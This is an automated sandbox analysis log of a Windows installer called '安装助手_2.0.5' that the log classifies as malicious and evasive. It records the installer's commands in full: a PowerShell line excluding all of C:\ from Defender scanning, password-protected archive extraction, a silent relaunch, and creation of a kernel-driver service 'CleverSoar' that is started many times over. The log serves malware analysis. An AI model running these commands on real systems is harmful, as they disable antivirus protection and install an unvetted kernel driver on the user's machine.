Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00F028E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2134065444.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000003.2133531361.0000000002D7E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, 00000000.00000000.2131817158.0000000000529000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.13.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal88.evad.winEXE@126/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC15D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F09313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F13D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00F09252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Code function: 6_2_6CC15240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File created: C:\Program Files (x86)\Windows NT\is-F6E4H.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5208:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6864:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4816:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2572:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4776:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3984:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3916:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5684:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | File created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.2149336504.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-R44JL.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | Virustotal: Detection: 8%
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$10404,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-LPJ40.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$40418,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-MLI2B.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
